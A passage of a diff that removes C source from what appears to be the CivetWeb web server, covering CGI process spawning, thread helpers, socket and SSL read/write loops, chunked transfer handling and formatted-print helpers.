-			goto spawn_cleanup;
-		}
-
-		if (mg_fopen(conn, cmdline, MG_FOPEN_MODE_READ, &file)) {
-			p = (char *)file.access.membuf;
-			mg_fgets(buf, sizeof(buf), &file, &p);
-			(void)mg_fclose(&file.access); /* ignore error on read only file */
-			buf[sizeof(buf) - 1] = '\0';
-		}
-
-		if ((buf[0] == '#') && (buf[1] == '!')) {
-			trim_trailing_whitespaces(buf + 2);
-		} else {
-			buf[2] = '\0';
-		}
-		interp = buf + 2;
-	}
-
-	if (interp[0] != '\0') {
-		GetFullPathNameA(interp, sizeof(full_interp), full_interp, NULL);
-		interp = full_interp;
-	}
-	GetFullPathNameA(dir, sizeof(full_dir), full_dir, NULL);
-
-	if (interp[0] != '\0') {
-		mg_snprintf(conn,
-		            &truncated,
-		            cmdline,
-		            sizeof(cmdline),
-		            "\"%s\" \"%s\\%s\"",
-		            interp,
-		            full_dir,
-		            prog);
-	} else {
-		mg_snprintf(conn,
-		            &truncated,
-		            cmdline,
-		            sizeof(cmdline),
-		            "\"%s\\%s\"",
-		            full_dir,
-		            prog);
-	}
-
-	if (truncated) {
-		pi.hProcess = (pid_t)-1;
-		goto spawn_cleanup;
-	}
-
-	DEBUG_TRACE("Running [%s]", cmdline);
-	if (CreateProcessA(NULL,
-	                   cmdline,
-	                   NULL,
-	                   NULL,
-	                   TRUE,
-	                   CREATE_NEW_PROCESS_GROUP,
-	                   envblk,
-	                   NULL,
-	                   &si,
-	                   &pi) == 0) {
-		mg_cry(
-		    conn, "%s: CreateProcess(%s): %ld", __func__, cmdline, (long)ERRNO);
-		pi.hProcess = (pid_t)-1;
-		/* goto spawn_cleanup; */
-	}
-
-spawn_cleanup:
-	(void)CloseHandle(si.hStdOutput);
-	(void)CloseHandle(si.hStdError);
-	(void)CloseHandle(si.hStdInput);
-	if (pi.hThread != NULL) {
-		(void)CloseHandle(pi.hThread);
-	}
-
-	return (pid_t)pi.hProcess;
-}
-#endif /* !NO_CGI */
-
-
-static int
-set_blocking_mode(SOCKET sock)
-{
-	unsigned long non_blocking = 0;
-	return ioctlsocket(sock, (long)FIONBIO, &non_blocking);
-}
-
-static int
-set_non_blocking_mode(SOCKET sock)
-{
-	unsigned long non_blocking = 1;
-	return ioctlsocket(sock, (long)FIONBIO, &non_blocking);
-}
-#else
-
-static int
-mg_stat(const struct mg_connection *conn,
-        const char *path,
-        struct mg_file_stat *filep)
-{
-	struct stat st;
-	if (!filep) {
-		return 0;
-	}
-	memset(filep, 0, sizeof(*filep));
-
-	if (conn && is_file_in_memory(conn, path)) {
-
-		/* Quick fix (for 1.9.x): */
-		/* mg_stat must fill all fields, also for files in memory */
-		struct mg_file tmp_file = STRUCT_FILE_INITIALIZER;
-		open_file_in_memory(conn, path, &tmp_file, MG_FOPEN_MODE_NONE);
-		filep->size = tmp_file.stat.size;
-		filep->last_modified = time(NULL);
-		filep->location = 2;
-		/* TODO: for 1.10: restructure how files in memory are handled */
-
-		return 1;
-	}
-
-	if (0 == stat(path, &st)) {
-		filep->size = (uint64_t)(st.st_size);
-		filep->last_modified = st.st_mtime;
-		filep->is_directory = S_ISDIR(st.st_mode);
-		return 1;
-	}
-
-	return 0;
-}
-
-
-static void
-set_close_on_exec(SOCKET fd, struct mg_connection *conn /* may be null */)
-{
-	if (fcntl(fd, F_SETFD, FD_CLOEXEC) != 0) {
-		if (conn) {
-			mg_cry(conn,
-			       "%s: fcntl(F_SETFD FD_CLOEXEC) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-	}
-}
-
-
-int
-mg_start_thread(mg_thread_func_t func, void *param)
-{
-	pthread_t thread_id;
-	pthread_attr_t attr;
-	int result;
-
-	(void)pthread_attr_init(&attr);
-	(void)pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size,
-	 * e.g. -DUSE_STACK_SIZE=16384 */
-	(void)pthread_attr_setstacksize(&attr, USE_STACK_SIZE);
-#endif /* defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1) */
-
-	result = pthread_create(&thread_id, &attr, func, param);
-	pthread_attr_destroy(&attr);
-
-	return result;
-}
-
-
-/* Start a thread storing the thread context. */
-static int
-mg_start_thread_with_id(mg_thread_func_t func,
-                        void *param,
-                        pthread_t *threadidptr)
-{
-	pthread_t thread_id;
-	pthread_attr_t attr;
-	int result;
-
-	(void)pthread_attr_init(&attr);
-
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size,
-	 * e.g. -DUSE_STACK_SIZE=16384 */
-	(void)pthread_attr_setstacksize(&attr, USE_STACK_SIZE);
-#endif /* defined(USE_STACK_SIZE) && USE_STACK_SIZE > 1 */
-
-	result = pthread_create(&thread_id, &attr, func, param);
-	pthread_attr_destroy(&attr);
-	if ((result == 0) && (threadidptr != NULL)) {
-		*threadidptr = thread_id;
-	}
-	return result;
-}
-
-
-/* Wait for a thread to finish. */
-static int
-mg_join_thread(pthread_t threadid)
-{
-	int result;
-
-	result = pthread_join(threadid, NULL);
-	return result;
-}
-
-
-#ifndef NO_CGI
-static pid_t
-spawn_process(struct mg_connection *conn,
-              const char *prog,
-              char *envblk,
-              char *envp[],
-              int fdin[2],
-              int fdout[2],
-              int fderr[2],
-              const char *dir)
-{
-	pid_t pid;
-	const char *interp;
-
-	(void)envblk;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if ((pid = fork()) == -1) {
-		/* Parent */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Creating CGI process\nfork(): %s",
-		                   strerror(ERRNO));
-	} else if (pid == 0) {
-		/* Child */
-		if (chdir(dir) != 0) {
-			mg_cry(conn, "%s: chdir(%s): %s", __func__, dir, strerror(ERRNO));
-		} else if (dup2(fdin[0], 0) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 0): %s",
-			       __func__,
-			       fdin[0],
-			       strerror(ERRNO));
-		} else if (dup2(fdout[1], 1) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 1): %s",
-			       __func__,
-			       fdout[1],
-			       strerror(ERRNO));
-		} else if (dup2(fderr[1], 2) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 2): %s",
-			       __func__,
-			       fderr[1],
-			       strerror(ERRNO));
-		} else {
-			/* Keep stderr and stdout in two different pipes.
-			 * Stdout will be sent back to the client,
-			 * stderr should go into a server error log. */
-			(void)close(fdin[0]);
-			(void)close(fdout[1]);
-			(void)close(fderr[1]);
-
-			/* Close write end fdin and read end fdout and fderr */
-			(void)close(fdin[1]);
-			(void)close(fdout[0]);
-			(void)close(fderr[0]);
-
-			/* After exec, all signal handlers are restored to their default
-			 * values, with one exception of SIGCHLD. According to
-			 * POSIX.1-2001 and Linux's implementation, SIGCHLD's handler will
-			 * leave unchanged after exec if it was set to be ignored. Restore
-			 * it to default action. */
-			signal(SIGCHLD, SIG_DFL);
-
-			interp = conn->ctx->config[CGI_INTERPRETER];
-			if (interp == NULL) {
-				(void)execle(prog, prog, NULL, envp);
-				mg_cry(conn,
-				       "%s: execle(%s): %s",
-				       __func__,
-				       prog,
-				       strerror(ERRNO));
-			} else {
-				(void)execle(interp, interp, prog, NULL, envp);
-				mg_cry(conn,
-				       "%s: execle(%s %s): %s",
-				       __func__,
-				       interp,
-				       prog,
-				       strerror(ERRNO));
-			}
-		}
-		exit(EXIT_FAILURE);
-	}
-
-	return pid;
-}
-#endif /* !NO_CGI */
-
-
-static int
-set_non_blocking_mode(SOCKET sock)
-{
-	int flags = fcntl(sock, F_GETFL, 0);
-	if (flags < 0) {
-		return -1;
-	}
-
-	if (fcntl(sock, F_SETFL, (flags | O_NONBLOCK)) < 0) {
-		return -1;
-	}
-	return 0;
-}
-
-static int
-set_blocking_mode(SOCKET sock)
-{
-	int flags = fcntl(sock, F_GETFL, 0);
-	if (flags < 0) {
-		return -1;
-	}
-
-	if (fcntl(sock, F_SETFL, flags & (~(int)(O_NONBLOCK))) < 0) {
-		return -1;
-	}
-	return 0;
-}
-#endif /* _WIN32 / else */
-
-/* End of initial operating system specific define block. */
-
-
-/* Get a random number (independent of C rand function) */
-static uint64_t
-get_random(void)
-{
-	static uint64_t lfsr = 0; /* Linear feedback shift register */
-	static uint64_t lcg = 0;  /* Linear congruential generator */
-	uint64_t now = mg_get_current_time_ns();
-
-	if (lfsr == 0) {
-		/* lfsr will be only 0 if has not been initialized,
-		 * so this code is called only once. */
-		lfsr = mg_get_current_time_ns();
-		lcg = mg_get_current_time_ns();
-	} else {
-		/* Get the next step of both random number generators. */
-		lfsr = (lfsr >> 1)
-		       | ((((lfsr >> 0) ^ (lfsr >> 1) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1)
-		          << 63);
-		lcg = lcg * 6364136223846793005LL + 1442695040888963407LL;
-	}
-
-	/* Combining two pseudo-random number generators and a high resolution
-	 * part
-	 * of the current server time will make it hard (impossible?) to guess
-	 * the
-	 * next number. */
-	return (lfsr ^ lcg ^ now);
-}
-
-
-static int
-mg_poll(struct pollfd *pfd,
-        unsigned int n,
-        int milliseconds,
-        volatile int *stop_server)
-{
-	/* Call poll, but only for a maximum time of a few seconds.
-	 * This will allow to stop the server after some seconds, instead
-	 * of having to wait for a long socket timeout. */
-	int ms_now = SOCKET_TIMEOUT_QUANTUM; /* Sleep quantum in ms */
-
-	do {
-		int result;
-
-		if (*stop_server) {
-			/* Shut down signal */
-			return -2;
-		}
-
-		if ((milliseconds >= 0) && (milliseconds < ms_now)) {
-			ms_now = milliseconds;
-		}
-
-		result = poll(pfd, n, ms_now);
-		if (result != 0) {
-			/* Poll returned either success (1) or error (-1).
-			 * Forward both to the caller. */
-			return result;
-		}
-
-		/* Poll returned timeout (0). */
-		if (milliseconds > 0) {
-			milliseconds -= ms_now;
-		}
-
-	} while (milliseconds != 0);
-
-	/* timeout: return 0 */
-	return 0;
-}
-
-
-/* Write data to the IO channel - opened file descriptor, socket or SSL
- * descriptor.
- * Return value:
- *  >=0 .. number of bytes successfully written
- *   -1 .. timeout
- *   -2 .. error
- */
-static int
-push_inner(struct mg_context *ctx,
-           FILE *fp,
-           SOCKET sock,
-           SSL *ssl,
-           const char *buf,
-           int len,
-           double timeout)
-{
-	uint64_t start = 0, now = 0, timeout_ns = 0;
-	int n, err;
-	unsigned ms_wait = SOCKET_TIMEOUT_QUANTUM; /* Sleep quantum in ms */
-
-#ifdef _WIN32
-	typedef int len_t;
-#else
-	typedef size_t len_t;
-#endif
-
-	if (timeout > 0) {
-		now = mg_get_current_time_ns();
-		start = now;
-		timeout_ns = (uint64_t)(timeout * 1.0E9);
-	}
-
-	if (ctx == NULL) {
-		return -2;
-	}
-
-#ifdef NO_SSL
-	if (ssl) {
-		return -2;
-	}
-#endif
-
-	/* Try to read until it succeeds, fails, times out, or the server
-	 * shuts down. */
-	for (;;) {
-
-#ifndef NO_SSL
-		if (ssl != NULL) {
-			n = SSL_write(ssl, buf, len);
-			if (n <= 0) {
-				err = SSL_get_error(ssl, n);
-				if ((err == SSL_ERROR_SYSCALL) && (n == -1)) {
-					err = ERRNO;
-				} else if ((err == SSL_ERROR_WANT_READ)
-				           || (err == SSL_ERROR_WANT_WRITE)) {
-					n = 0;
-				} else {
-					DEBUG_TRACE("SSL_write() failed, error %d", err);
-					return -2;
-				}
-			} else {
-				err = 0;
-			}
-		} else
-#endif
-		    if (fp != NULL) {
-			n = (int)fwrite(buf, 1, (size_t)len, fp);
-			if (ferror(fp)) {
-				n = -1;
-				err = ERRNO;
-			} else {
-				err = 0;
-			}
-		} else {
-			n = (int)send(sock, buf, (len_t)len, MSG_NOSIGNAL);
-			err = (n < 0) ? ERRNO : 0;
-#ifdef _WIN32
-			if (err == WSAEWOULDBLOCK) {
-				err = 0;
-				n = 0;
-			}
-#else
-			if (err == EWOULDBLOCK) {
-				err = 0;
-				n = 0;
-			}
-#endif
-			if (n < 0) {
-				/* shutdown of the socket at client side */
-				return -2;
-			}
-		}
-
-		if (ctx->stop_flag) {
-			return -2;
-		}
-
-		if ((n > 0) || ((n == 0) && (len == 0))) {
-			/* some data has been read, or no data was requested */
-			return n;
-		}
-		if (n < 0) {
-			/* socket error - check errno */
-			DEBUG_TRACE("send() failed, error %d", err);
-
-			/* TODO (mid): error handling depending on the error code.
-			 * These codes are different between Windows and Linux.
-			 * Currently there is no problem with failing send calls,
-			 * if there is a reproducible situation, it should be
-			 * investigated in detail.
-			 */
-			return -2;
-		}
-
-		/* Only in case n=0 (timeout), repeat calling the write function */
-
-		/* If send failed, wait before retry */
-		if (fp != NULL) {
-			/* For files, just wait a fixed time,
-			 * maybe an average disk seek time. */
-			mg_sleep(ms_wait > 10 ? 10 : ms_wait);
-		} else {
-			/* For sockets, wait for the socket using select */
-			fd_set wfds;
-			struct timeval tv;
-			int sret;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* GCC seems to have a flaw with it's own socket macros:
- * http://www.linuxquestions.org/questions/programming-9/impossible-to-use-gcc-with-wconversion-and-standard-socket-macros-841935/
- */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wsign-conversion"
-#endif
-
-			FD_ZERO(&wfds);
-			FD_SET(sock, &wfds);
-			tv.tv_sec = (time_t)(ms_wait / 1000);
-			tv.tv_usec = (long)((ms_wait % 1000) * 1000);
-
-			sret = select((int)sock + 1, NULL, &wfds, NULL, &tv);
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-			if (sret > 0) {
-				/* We got ready to write. Don't check the timeout
-				 * but directly go back to write again. */
-				continue;
-			}
-		}
-
-		if (timeout > 0) {
-			now = mg_get_current_time_ns();
-			if ((now - start) > timeout_ns) {
-				/* Timeout */
-				break;
-			}
-		}
-	}
-
-	(void)err; /* Avoid unused warning if NO_SSL is set and DEBUG_TRACE is not
-	              used */
-
-	return -1;
-}
-
-
-static int64_t
-push_all(struct mg_context *ctx,
-         FILE *fp,
-         SOCKET sock,
-         SSL *ssl,
-         const char *buf,
-         int64_t len)
-{
-	double timeout = -1.0;
-	int64_t n, nwritten = 0;
-
-	if (ctx == NULL) {
-		return -1;
-	}
-
-	if (ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	while ((len > 0) && (ctx->stop_flag == 0)) {
-		n = push_inner(ctx, fp, sock, ssl, buf + nwritten, (int)len, timeout);
-		if (n < 0) {
-			if (nwritten == 0) {
-				nwritten = n; /* Propagate the error */
-			}
-			break;
-		} else if (n == 0) {
-			break; /* No more data to write */
-		} else {
-			nwritten += n;
-			len -= n;
-		}
-	}
-
-	return nwritten;
-}
-
-
-/* Read from IO channel - opened file descriptor, socket, or SSL descriptor.
- * Return value:
- *  >=0 .. number of bytes successfully read
- *   -1 .. timeout
- *   -2 .. error
- */
-static int
-pull_inner(FILE *fp,
-           struct mg_connection *conn,
-           char *buf,
-           int len,
-           double timeout)
-{
-	int nread, err = 0;
-
-#ifdef _WIN32
-	typedef int len_t;
-#else
-	typedef size_t len_t;
-#endif
-#ifndef NO_SSL
-	int ssl_pending;
-#endif
-
-	/* We need an additional wait loop around this, because in some cases
-	 * with TLSwe may get data from the socket but not from SSL_read.
-	 * In this case we need to repeat at least once.
-	 */
-
-	if (fp != NULL) {
-#if !defined(_WIN32_WCE)
-		/* Use read() instead of fread(), because if we're reading from the
-		 * CGI pipe, fread() may block until IO buffer is filled up. We
-		 * cannot afford to block and must pass all read bytes immediately
-		 * to the client. */
-		nread = (int)read(fileno(fp), buf, (size_t)len);
-#else
-		/* WinCE does not support CGI pipes */
-		nread = (int)fread(buf, 1, (size_t)len, fp);
-#endif
-		err = (nread < 0) ? ERRNO : 0;
-		if ((nread == 0) && (len > 0)) {
-			/* Should get data, but got EOL */
-			return -2;
-		}
-
-#ifndef NO_SSL
-	} else if ((conn->ssl != NULL)
-	           && ((ssl_pending = SSL_pending(conn->ssl)) > 0)) {
-		/* We already know there is no more data buffered in conn->buf
-		 * but there is more available in the SSL layer. So don't poll
-		 * conn->client.sock yet. */
-		if (ssl_pending > len) {
-			ssl_pending = len;
-		}
-		nread = SSL_read(conn->ssl, buf, ssl_pending);
-		if (nread <= 0) {
-			err = SSL_get_error(conn->ssl, nread);
-			if ((err == SSL_ERROR_SYSCALL) && (nread == -1)) {
-				err = ERRNO;
-			} else if ((err == SSL_ERROR_WANT_READ)
-			           || (err == SSL_ERROR_WANT_WRITE)) {
-				nread = 0;
-			} else {
-				DEBUG_TRACE("SSL_read() failed, error %d", err);
-				return -1;
-			}
-		} else {
-			err = 0;
-		}
-
-	} else if (conn->ssl != NULL) {
-
-		struct pollfd pfd[1];
-		int pollres;
-
-		pfd[0].fd = conn->client.sock;
-		pfd[0].events = POLLIN;
-		pollres =
-		    mg_poll(pfd, 1, (int)(timeout * 1000.0), &(conn->ctx->stop_flag));
-		if (conn->ctx->stop_flag) {
-			return -2;
-		}
-		if (pollres > 0) {
-			nread = SSL_read(conn->ssl, buf, len);
-			if (nread <= 0) {
-				err = SSL_get_error(conn->ssl, nread);
-				if ((err == SSL_ERROR_SYSCALL) && (nread == -1)) {
-					err = ERRNO;
-				} else if ((err == SSL_ERROR_WANT_READ)
-				           || (err == SSL_ERROR_WANT_WRITE)) {
-					nread = 0;
-				} else {
-					DEBUG_TRACE("SSL_read() failed, error %d", err);
-					return -2;
-				}
-			} else {
-				err = 0;
-			}
-
-		} else if (pollres < 0) {
-			/* Error */
-			return -2;
-		} else {
-			/* pollres = 0 means timeout */
-			nread = 0;
-		}
-#endif
-
-	} else {
-		struct pollfd pfd[1];
-		int pollres;
-
-		pfd[0].fd = conn->client.sock;
-		pfd[0].events = POLLIN;
-		pollres =
-		    mg_poll(pfd, 1, (int)(timeout * 1000.0), &(conn->ctx->stop_flag));
-		if (conn->ctx->stop_flag) {
-			return -2;
-		}
-		if (pollres > 0) {
-			nread = (int)recv(conn->client.sock, buf, (len_t)len, 0);
-			err = (nread < 0) ? ERRNO : 0;
-			if (nread <= 0) {
-				/* shutdown of the socket at client side */
-				return -2;
-			}
-		} else if (pollres < 0) {
-			/* error callint poll */
-			return -2;
-		} else {
-			/* pollres = 0 means timeout */
-			nread = 0;
-		}
-	}
-
-	if (conn->ctx->stop_flag) {
-		return -2;
-	}
-
-	if ((nread > 0) || ((nread == 0) && (len == 0))) {
-		/* some data has been read, or no data was requested */
-		return nread;
-	}
-
-	if (nread < 0) {
-/* socket error - check errno */
-#ifdef _WIN32
-		if (err == WSAEWOULDBLOCK) {
-			/* TODO (low): check if this is still required */
-			/* standard case if called from close_socket_gracefully */
-			return -2;
-		} else if (err == WSAETIMEDOUT) {
-			/* TODO (low): check if this is still required */
-			/* timeout is handled by the while loop  */
-			return 0;
-		} else if (err == WSAECONNABORTED) {
-			/* See https://www.chilkatsoft.com/p/p_299.asp */
-			return -2;
-		} else {
-			DEBUG_TRACE("recv() failed, error %d", err);
-			return -2;
-		}
-#else
-		/* TODO: POSIX returns either EAGAIN or EWOULDBLOCK in both cases,
-		 * if the timeout is reached and if the socket was set to non-
-		 * blocking in close_socket_gracefully, so we can not distinguish
-		 * here. We have to wait for the timeout in both cases for now.
-		 */
-		if ((err == EAGAIN) || (err == EWOULDBLOCK) || (err == EINTR)) {
-			/* TODO (low): check if this is still required */
-			/* EAGAIN/EWOULDBLOCK:
-			 * standard case if called from close_socket_gracefully
-			 * => should return -1 */
-			/* or timeout occured
-			 * => the code must stay in the while loop */
-
-			/* EINTR can be generated on a socket with a timeout set even
-			 * when SA_RESTART is effective for all relevant signals
-			 * (see signal(7)).
-			 * => stay in the while loop */
-		} else {
-			DEBUG_TRACE("recv() failed, error %d", err);
-			return -2;
-		}
-#endif
-	}
-
-	/* Timeout occured, but no data available. */
-	return -1;
-}
-
-
-static int
-pull_all(FILE *fp, struct mg_connection *conn, char *buf, int len)
-{
-	int n, nread = 0;
-	double timeout = -1.0;
-	uint64_t start_time = 0, now = 0, timeout_ns = 0;
-
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-	if (timeout >= 0.0) {
-		start_time = mg_get_current_time_ns();
-		timeout_ns = (uint64_t)(timeout * 1.0E9);
-	}
-
-	while ((len > 0) && (conn->ctx->stop_flag == 0)) {
-		n = pull_inner(fp, conn, buf + nread, len, timeout);
-		if (n == -2) {
-			if (nread == 0) {
-				nread = -1; /* Propagate the error */
-			}
-			break;
-		} else if (n == -1) {
-			/* timeout */
-			if (timeout >= 0.0) {
-				now = mg_get_current_time_ns();
-				if ((now - start_time) <= timeout_ns) {
-					continue;
-				}
-			}
-			break;
-		} else if (n == 0) {
-			break; /* No more data to read */
-		} else {
-			conn->consumed_content += n;
-			nread += n;
-			len -= n;
-		}
-	}
-
-	return nread;
-}
-
-
-static void
-discard_unread_request_data(struct mg_connection *conn)
-{
-	char buf[MG_BUF_LEN];
-	size_t to_read;
-	int nread;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	to_read = sizeof(buf);
-
-	if (conn->is_chunked) {
-		/* Chunked encoding: 3=chunk read completely
-		 * completely */
-		while (conn->is_chunked != 3) {
-			nread = mg_read(conn, buf, to_read);
-			if (nread <= 0) {
-				break;
-			}
-		}
-
-	} else {
-		/* Not chunked: content length is known */
-		while (conn->consumed_content < conn->content_len) {
-			if (to_read
-			    > (size_t)(conn->content_len - conn->consumed_content)) {
-				to_read = (size_t)(conn->content_len - conn->consumed_content);
-			}
-
-			nread = mg_read(conn, buf, to_read);
-			if (nread <= 0) {
-				break;
-			}
-		}
-	}
-}
-
-
-static int
-mg_read_inner(struct mg_connection *conn, void *buf, size_t len)
-{
-	int64_t n, buffered_len, nread;
-	int64_t len64 =
-	    (int64_t)((len > INT_MAX) ? INT_MAX : len); /* since the return value is
-	                                               * int, we may not read more
-	                                               * bytes */
-	const char *body;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	/* If Content-Length is not set for a request with body data
-	 * (e.g., a PUT or POST request), we do not know in advance
-	 * how much data should be read. */
-	if (conn->consumed_content == 0) {
-		if (conn->is_chunked == 1) {
-			conn->content_len = len64;
-			conn->is_chunked = 2;
-		} else if (conn->content_len == -1) {
-			/* The body data is completed when the connection
-			 * is closed. */
-			conn->content_len = INT64_MAX;
-			conn->must_close = 1;
-		}
-	}
-
-	nread = 0;
-	if (conn->consumed_content < conn->content_len) {
-		/* Adjust number of bytes to read. */
-		int64_t left_to_read = conn->content_len - conn->consumed_content;
-		if (left_to_read < len64) {
-			/* Do not read more than the total content length of the
-			 * request.
-			 */
-			len64 = left_to_read;
-		}
-
-		/* Return buffered data */
-		buffered_len = (int64_t)(conn->data_len) - (int64_t)conn->request_len
-		               - conn->consumed_content;
-		if (buffered_len > 0) {
-			if (len64 < buffered_len) {
-				buffered_len = len64;
-			}
-			body = conn->buf + conn->request_len + conn->consumed_content;
-			memcpy(buf, body, (size_t)buffered_len);
-			len64 -= buffered_len;
-			conn->consumed_content += buffered_len;
-			nread += buffered_len;
-			buf = (char *)buf + buffered_len;
-		}
-
-		/* We have returned all buffered data. Read new data from the remote
-		 * socket.
-		 */
-		if ((n = pull_all(NULL, conn, (char *)buf, (int)len64)) >= 0) {
-			nread += n;
-		} else {
-			nread = ((nread > 0) ? nread : n);
-		}
-	}
-	return (int)nread;
-}
-
-
-static char
-mg_getc(struct mg_connection *conn)
-{
-	char c;
-	if (conn == NULL) {
-		return 0;
-	}
-	if (mg_read_inner(conn, &c, 1) <= 0) {
-		return (char)0;
-	}
-	return c;
-}
-
-
-int
-mg_read(struct mg_connection *conn, void *buf, size_t len)
-{
-	if (len > INT_MAX) {
-		len = INT_MAX;
-	}
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if (conn->is_chunked) {
-		size_t all_read = 0;
-
-		while (len > 0) {
-			if (conn->is_chunked == 3) {
-				/* No more data left to read */
-				return 0;
-			}
-
-			if (conn->chunk_remainder) {
-				/* copy from the remainder of the last received chunk */
-				long read_ret;
-				size_t read_now =
-				    ((conn->chunk_remainder > len) ? (len)
-				                                   : (conn->chunk_remainder));
-
-				conn->content_len += (int)read_now;
-				read_ret =
-				    mg_read_inner(conn, (char *)buf + all_read, read_now);
-
-				if (read_ret < 1) {
-					/* read error */
-					return -1;
-				}
-
-				all_read += (size_t)read_ret;
-				conn->chunk_remainder -= (size_t)read_ret;
-				len -= (size_t)read_ret;
-
-				if (conn->chunk_remainder == 0) {
-					/* Add data bytes in the current chunk have been read,
-					 * so we are expecting \r\n now. */
-					char x1, x2;
-					conn->content_len += 2;
-					x1 = mg_getc(conn);
-					x2 = mg_getc(conn);
-					if ((x1 != '\r') || (x2 != '\n')) {
-						/* Protocol violation */
-						return -1;
-					}
-				}
-
-			} else {
-				/* fetch a new chunk */
-				int i = 0;
-				char lenbuf[64];
-				char *end = 0;
-				unsigned long chunkSize = 0;
-
-				for (i = 0; i < ((int)sizeof(lenbuf) - 1); i++) {
-					conn->content_len++;
-					lenbuf[i] = mg_getc(conn);
-					if ((i > 0) && (lenbuf[i] == '\r')
-					    && (lenbuf[i - 1] != '\r')) {
-						continue;
-					}
-					if ((i > 1) && (lenbuf[i] == '\n')
-					    && (lenbuf[i - 1] == '\r')) {
-						lenbuf[i + 1] = 0;
-						chunkSize = strtoul(lenbuf, &end, 16);
-						if (chunkSize == 0) {
-							/* regular end of content */
-							conn->is_chunked = 3;
-						}
-						break;
-					}
-					if (!isxdigit(lenbuf[i])) {
-						/* illegal character for chunk length */
-						return -1;
-					}
-				}
-				if ((end == NULL) || (*end != '\r')) {
-					/* chunksize not set correctly */
-					return -1;
-				}
-				if (chunkSize == 0) {
-					break;
-				}
-
-				conn->chunk_remainder = chunkSize;
-			}
-		}
-
-		return (int)all_read;
-	}
-	return mg_read_inner(conn, buf, len);
-}
-
-
-int
-mg_write(struct mg_connection *conn, const void *buf, size_t len)
-{
-	time_t now;
-	int64_t n, total, allowed;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if (conn->throttle > 0) {
-		if ((now = time(NULL)) != conn->last_throttle_time) {
-			conn->last_throttle_time = now;
-			conn->last_throttle_bytes = 0;
-		}
-		allowed = conn->throttle - conn->last_throttle_bytes;
-		if (allowed > (int64_t)len) {
-			allowed = (int64_t)len;
-		}
-		if ((total = push_all(conn->ctx,
-		                      NULL,
-		                      conn->client.sock,
-		                      conn->ssl,
-		                      (const char *)buf,
-		                      (int64_t)allowed)) == allowed) {
-			buf = (const char *)buf + total;
-			conn->last_throttle_bytes += total;
-			while ((total < (int64_t)len) && (conn->ctx->stop_flag == 0)) {
-				allowed = (conn->throttle > ((int64_t)len - total))
-				              ? (int64_t)len - total
-				              : conn->throttle;
-				if ((n = push_all(conn->ctx,
-				                  NULL,
-				                  conn->client.sock,
-				                  conn->ssl,
-				                  (const char *)buf,
-				                  (int64_t)allowed)) != allowed) {
-					break;
-				}
-				sleep(1);
-				conn->last_throttle_bytes = allowed;
-				conn->last_throttle_time = time(NULL);
-				buf = (const char *)buf + n;
-				total += n;
-			}
-		}
-	} else {
-		total = push_all(conn->ctx,
-		                 NULL,
-		                 conn->client.sock,
-		                 conn->ssl,
-		                 (const char *)buf,
-		                 (int64_t)len);
-	}
-	if (total > 0) {
-		conn->num_bytes_sent += total;
-	}
-	return (int)total;
-}
-
-
-/* Send a chunk, if "Transfer-Encoding: chunked" is used */
-int
-mg_send_chunk(struct mg_connection *conn,
-              const char *chunk,
-              unsigned int chunk_len)
-{
-	char lenbuf[16];
-	size_t lenbuf_len;
-	int ret;
-	int t;
-
-	/* First store the length information in a text buffer. */
-	sprintf(lenbuf, "%x\r\n", chunk_len);
-	lenbuf_len = strlen(lenbuf);
-
-	/* Then send length information, chunk and terminating \r\n. */
-	ret = mg_write(conn, lenbuf, lenbuf_len);
-	if (ret != (int)lenbuf_len) {
-		return -1;
-	}
-	t = ret;
-
-	ret = mg_write(conn, chunk, chunk_len);
-	if (ret != (int)chunk_len) {
-		return -1;
-	}
-	t += ret;
-
-	ret = mg_write(conn, "\r\n", 2);
-	if (ret != 2) {
-		return -1;
-	}
-	t += ret;
-
-	return t;
-}
-
-
-/* Alternative alloc_vprintf() for non-compliant C runtimes */
-static int
-alloc_vprintf2(char **buf, const char *fmt, va_list ap)
-{
-	va_list ap_copy;
-	size_t size = MG_BUF_LEN / 4;
-	int len = -1;
-
-	*buf = NULL;
-	while (len < 0) {
-		if (*buf) {
-			mg_free(*buf);
-		}
-
-		size *= 4;
-		*buf = (char *)mg_malloc(size);
-		if (!*buf) {
-			break;
-		}
-
-		va_copy(ap_copy, ap);
-		len = vsnprintf_impl(*buf, size - 1, fmt, ap_copy);
-		va_end(ap_copy);
-		(*buf)[size - 1] = 0;
-	}
-
-	return len;
-}
-
-
-/* Print message to buffer. If buffer is large enough to hold the message,
- * return buffer. If buffer is to small, allocate large enough buffer on
- * heap,
- * and return allocated buffer. */
-static int
-alloc_vprintf(char **out_buf,
-              char *prealloc_buf,
-              size_t prealloc_size,
-              const char *fmt,
-              va_list ap)
-{
-	va_list ap_copy;
-	int len;
-
-	/* Windows is not standard-compliant, and vsnprintf() returns -1 if
-	 * buffer is too small. Also, older versions of msvcrt.dll do not have
-	 * _vscprintf().  However, if size is 0, vsnprintf() behaves correctly.
-	 * Therefore, we make two passes: on first pass, get required message
-	 * length.
-	 * On second pass, actually print the message. */
-	va_copy(ap_copy, ap);
-	len = vsnprintf_impl(NULL, 0, fmt, ap_copy);
-	va_end(ap_copy);
-
-	if (len < 0) {
-		/* C runtime is not standard compliant, vsnprintf() returned -1.
